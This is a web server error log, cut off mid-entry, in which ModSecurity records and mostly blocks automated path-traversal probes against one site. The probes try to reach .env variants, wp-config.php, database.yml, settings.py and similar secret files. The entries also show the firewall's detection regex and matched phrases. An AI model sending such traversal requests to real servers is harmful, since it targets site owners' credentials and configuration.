[Tue May 12 06:16:39.828488 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKppvaAnTZtx1_H_wzGUgAAAUM"]
[Tue May 12 06:16:39.853391 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpp_aAnTZtx1_H_wzGVAAAAUM"]
[Tue May 12 06:16:39.853601 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpp_aAnTZtx1_H_wzGVAAAAUM"]
[Tue May 12 06:16:39.998170 2026] [core:error] [pid 1842385:tid 1842390] [client 45.148.10.238:62096] AH10244: invalid URI path (/img../../../.env)
[Tue May 12 06:16:40.043942 2026] [core:error] [pid 1820198:tid 1820208] [client 45.148.10.238:62118] AH10244: invalid URI path (/img../../../../.env)
[Tue May 12 06:16:40.141275 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKppxfeipD4uoG21FpAFgAAAAc"]
[Tue May 12 06:16:40.166570 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/www/.env"] [unique_id "agKpqBfeipD4uoG21FpAGAAAAAc"]
[Tue May 12 06:16:40.166775 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/www/.env"] [unique_id "agKpqBfeipD4uoG21FpAGAAAAAc"]
[Tue May 12 06:16:40.558188 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpp_aAnTZtx1_H_wzGVAAAAUM"]
[Tue May 12 06:16:40.583603 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpqPaAnTZtx1_H_wzGXQAAAUM"]
[Tue May 12 06:16:40.583815 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpqPaAnTZtx1_H_wzGXQAAAUM"]
[Tue May 12 06:16:40.619681 2026] [core:error] [pid 1844863:tid 1844890] [client 45.148.10.238:62144] AH10244: invalid URI path (/media../../../.env)
[Tue May 12 06:16:40.663690 2026] [core:error] [pid 1825179:tid 1825211] [client 45.148.10.238:62156] AH10244: invalid URI path (/media../../../../.env)
[Tue May 12 06:16:41.103457 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpqBfeipD4uoG21FpAGAAAAAc"]
[Tue May 12 06:16:41.274788 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpqPaAnTZtx1_H_wzGXQAAAUM"]
[Tue May 12 06:16:41.299796 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpqfaAnTZtx1_H_wzGYAAAAUM"]
[Tue May 12 06:16:41.299877 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpqfaAnTZtx1_H_wzGYAAAAUM"]
[Tue May 12 06:16:41.300055 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpqfaAnTZtx1_H_wzGYAAAAUM"]
[Tue May 12 06:16:41.782311 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpqfaAnTZtx1_H_wzGYAAAAUM"]
[Tue May 12 06:16:41.806672 2026] [core:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] AH10244: invalid URI path (/js../../../.env)
[Tue May 12 06:16:42.309396 2026] [core:error] [pid 1825179:tid 1825203] [client 45.148.10.238:62174] AH10244: invalid URI path (/uploads../../../.env)
[Tue May 12 06:16:42.352661 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/_profiler/open"] [unique_id "agKpqhfeipD4uoG21FpAHAAAAAc"]
[Tue May 12 06:16:42.353097 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/_profiler/open"] [unique_id "agKpqhfeipD4uoG21FpAHAAAAAc"]
[Tue May 12 06:16:42.545349 2026] [core:error] [pid 1842385:tid 1842414] [client 45.148.10.166:13842] AH10244: invalid URI path (/js../../../../.env)
[Tue May 12 06:16:42.829211 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpqhfeipD4uoG21FpAHAAAAAc"]
[Tue May 12 06:16:42.856068 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/_profiler/open"] [unique_id "agKpqhfeipD4uoG21FpAHgAAAAc"]
[Tue May 12 06:16:42.856528 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/_profiler/open"] [unique_id "agKpqhfeipD4uoG21FpAHgAAAAc"]
[Tue May 12 06:16:43.090216 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpq9r1yOh9TvizezitxwAAAEc"]
[Tue May 12 06:16:43.090305 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpq9r1yOh9TvizezitxwAAAEc"]
[Tue May 12 06:16:43.090475 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpq9r1yOh9TvizezitxwAAAEc"]
[Tue May 12 06:16:43.606339 2026] [core:error] [pid 1825179:tid 1825220] [client 45.148.10.238:62176] AH10244: invalid URI path (/uploads../../../../.env)
[Tue May 12 06:16:43.812689 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpqhfeipD4uoG21FpAHgAAAAc"]
[Tue May 12 06:16:45.004719 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpq9r1yOh9TvizezitxwAAAEc"]
[Tue May 12 06:16:45.031317 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKprdr1yOh9Tvizezit1QAAAEc"]
[Tue May 12 06:16:45.031390 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKprdr1yOh9Tvizezit1QAAAEc"]
[Tue May 12 06:16:45.031553 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKprdr1yOh9Tvizezit1QAAAEc"]
[Tue May 12 06:16:45.088620 2026] [core:error] [pid 1825179:tid 1825200] [client 45.148.10.238:65232] AH10244: invalid URI path (/images../../../.env)
[Tue May 12 06:16:45.540172 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKprdr1yOh9Tvizezit1QAAAEc"]
[Tue May 12 06:16:45.565176 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKprdr1yOh9Tvizezit2AAAAEc"]
[Tue May 12 06:16:45.565252 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKprdr1yOh9Tvizezit2AAAAEc"]
[Tue May 12 06:16:45.565415 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKprdr1yOh9Tvizezit2AAAAEc"]
[Tue May 12 06:16:46.188473 2026] [core:error] [pid 1825287:tid 1825315] [client 45.148.10.238:65236] AH10244: invalid URI path (/images../../../../.env)
[Tue May 12 06:16:46.235151 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKprdr1yOh9Tvizezit2AAAAEc"]
[Tue May 12 06:16:46.259938 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] 